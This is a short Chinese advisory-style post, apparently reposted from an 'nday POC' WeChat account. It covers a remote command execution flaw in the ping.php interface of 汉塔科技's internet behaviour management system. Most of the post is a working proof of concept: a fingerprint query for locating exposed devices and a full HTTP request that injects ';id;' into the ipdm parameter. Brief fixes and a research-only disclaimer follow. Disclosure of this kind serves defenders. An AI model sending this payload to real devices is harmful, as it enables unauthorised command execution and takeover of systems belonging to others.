汉塔科技-上网行为管理系统 ping.php 接口存在远程命令执行漏洞,经过身份验证的恶意攻击者可以利用该漏洞远程执行任意命令,获取系统权限。
body="Antasys"
GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1 Host: Priority: u=0, i User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: PHPSESSID=515a7b9608e8a01fd03889ccf28bf590 Upgrade-Insecure-Requests: 1
nuclei
afrog
xray
1、关闭互联网暴露面或接口设置访问权限
2、升级至安全版本
原文始发于微信公众号(nday POC):汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论